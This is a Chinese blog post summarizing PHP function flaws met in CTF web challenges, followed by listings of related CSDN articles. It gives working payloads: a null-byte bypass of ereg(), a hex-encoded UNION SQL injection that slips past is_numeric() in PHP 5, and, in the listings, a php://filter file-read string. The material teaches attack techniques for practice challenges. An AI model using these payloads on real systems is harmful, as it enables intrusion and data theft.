CTF web题总结--php函数漏洞

最新推荐文章于 2024-07-25 23:59:49 发布
最新推荐文章于 2024-07-25 23:59:49 发布
阅读量2.6k 收藏 8
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20817327/article/details/77735750
版权

php函数漏洞总结
1、ereg()截断漏洞
代码:

<?php
session_start();
if (isset($_POST['submit'])) {
  $verifycode = $_POST['verifycode'];
  $b = false;
  if (@ereg("^[1-9]+$", $verifycode) === FALSE)
  {
    $b = false;
    echo 'b is false';
  }
  else if (strpos($verifycode, 'xiaoboshifudaiwofei') !== FALSE)   
  {
    $b = true;
     echo 'b is true';
  }
}
?>

payload:

9%00xiaoboshifudaiwofei

2、is_numeric()漏洞
代码:

 if(!is_numeric($page)){
              die("page must be a number!");   
          }
          if($page<1) $page=1;

          $sql="update page set num=$page";
          $res=mysql_my_query($sql);
          if($res){
                echo "<script>alert('update  success!');</script>";
                echo("<script>location.href='./index.php?action=admin&mode=index'</script>");

          }else{
               echo "<script>alert('update  fail!');</script>";
               die();
          }

php 5.x 版本中 is_numeric 的缺陷 (php7.0 已经修复了 ), 它认为 0x…. 是整数

import binascii
a='1 union all select flag,flag,flag,flag from flags'
binascii.hexlify(a)
3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773

page:

0x3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773
bob62856
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFPHP常见漏洞及利用(未完待续)
qq_34106499的博客
01-25 5159
总结ctf出现的php漏洞及利用
CTF常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2549
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
CTF-PHP漏洞总结(持续更新)
kuller_Yan的博客
03-25 1024
本篇博客是我自己遇到的PHP漏洞的汇总 1:文件包含漏洞:这里便是运用到了PHP的封装协议 现在已知是文件包含漏洞目了,下一步我们就需要去读取被包含文件的内容,使用php://filter伪协议,具体如下: php://filter/read=convert.base64-encode/resource=index.php 将这段代码替换掉网页链接show.php的位置,回车执行 2:要求ke...
ctf从入门到放弃:SQL漏洞的常见防范190510
爱党人士
05-11 258
SQL Inject注入漏洞的防范:  代码层面 对输入进行严格的转义和过滤 使用预处理和参数化(Parameterized )  网路层面 通过WAF设备启用防SQL Inject注入策略(或类似防护系统) 云端防护(360网站卫士,阿里云盾等) 代码层面: PHP防范转义+过滤 但其实效果并不是太好。 因为数据库版本会更新的, 已更新后可能会产生新的函数,新的语法, 那么就意味着...
CTF-web 命令执行漏洞
最新发布
2302_80276789的博客
07-25 240
比如在php里面有一些函数可以操作系统比如system,exec,shell_exec等,加入我们要创建一个abc的目录,我们可以system,这种情况他给定的系统命令是写死的用户没有办法去控制,则不存在漏洞, 当我们数如的东西是可以控制的时候,那么此时就很容易产生漏洞。在控制栏进行ls-l会出来文件的所属用户, 第一个表示文件属性(-是文件,d是目录)后面的表示权限每三位表示当前用户,当前组里面的其他用户,其他,的权限,r是可读,w可写,x可执行(execute)。
CTFWeb方向练习)(持续更新)
m0_56010012的博客
02-23 5160
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
ctf攻防世界 WEB:php_rce
qq_30889301的博客
05-09 990
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
ctf php侧漏,ctf常见的PHP漏洞小结
weixin_39588252的博客
04-01 1429
ctf常见的PHP漏洞小结在做ctf的时候经常会遇到一些PHP代码审计的目,这里将我遇到过的常见漏洞做一个小结。md5()漏洞PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。常见的payload有QNKCDZO24061070...
ctf-web--总结几点基础的做思路
Sanky0u的博客
08-14 2万+
做了三天web了,因为刚入门,还是不要做得太快,先把前几天学到的好好总结一下,一部分是做的几道bugku上的web,一部分是合天网安上面做的几道web,这篇博客就先介绍第一部分。 1. 看源码可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2.
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1638
文章目录前言一、目描述二、解步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 目分类: CTFWeb—文件包含—02—rot13伪协议 一、目描述 目:13、另辟蹊径 (号为13) 二、解步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
002-CTF web理论基础篇-第二课理论基础.pdf
07-09
CTF(Capture The Flag)是一种网络安全竞赛,其Web目主要涉及Web安全领域的知识和技巧。本篇将深入探讨CTF Web型的基础理论,帮助参赛者理解和掌握解的关键点。 1. 工具集: 在CTF Web挑战,通常会...
2016 SWPU CTF web1目源码
10-31
2016 SWPU CTF web1目源码
CTF---Web---文件包含---03---require_once
qq_22160557的博客
07-28 1787
文章目录前言一、目描述二、解步骤1、御剑扫描2、审计源代码3、构造payload4、查表名5、查列名6、查字段名总结 前言 目分类: CTFWeb—文件包含—03—require_once 一、目描述 目: b-11-未写完的网站 二、解步骤 1、御剑扫描 Step1:用御剑扫描后,得到web.zip,为网站源代码。 2、审计源代码 Step2:目逻辑: info.php页面的role变量未经过addslashes过滤,经过将传入的$tem参数赋值为…/edit_info时,re
CTF---web入门---php
Bad_Monkey的博客
09-19 862
不显示错误 @$a=trim(file_get_contents($b));//@表示 如果脚本这句话出现的错误,不会将错误输出来 ini_set("display_errors", 0);//更改php.ini配置,错误不会显示 例如: test.php代码如下 ini_set('display_errors', 0); include('hi.php'); 此时,如果 test.php有错...
攻防世界ctf web easyphp解wp
qq_41169485的博客
09-28 3782
第二步,用php代码编写MD5碰撞脚本得到b=53724。第五步,绕过array_search函数。第一步,用科学计数法绕过 a=1e9。第三步,绕过is_numeric函数。第四步,绕过is_array函数。一定要对传值url编码。
CTFweb库笔记(难度1)
cocoaiu的博客
08-11 8225
CTF笔记
CTF常见的php函数绕过(保持更新)
csu_vc的博客
11-03 1万+
is_numeric()用于判断是否是数字,通常配合数值判断is_numeric(@$a["param1"])?exit:NULL; if(@$a["param1"]){ ($a["param1"]>2017)?$v1=1:NULL; } //param1不能是数字,但又要比2017大,利用数组$pos = array_search("nudt",$a["param2"]); $pos ==
CTF web总结--LFI
bob的博客
08-30 8717
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 目的url都是类似这种:http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote
CTF writeup 2_南邮网络攻防训练
热门推荐
Troy
10-28 146万+
地址地址WEB签到这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/“key在哪里? ” 在源码里~md5 collision源码<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51
CTF Web理论基础篇-第二课:工具集与php弱类型
综上所述,本文总结了《002-CTF web理论基础篇-第二课理论基础.pdf》和《002-CTF web理论基础篇-第二课理论基础》的内容,包括CTF网页型的工具集和理论基础。同时,我们也了解了php的弱类型特性和类型转换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值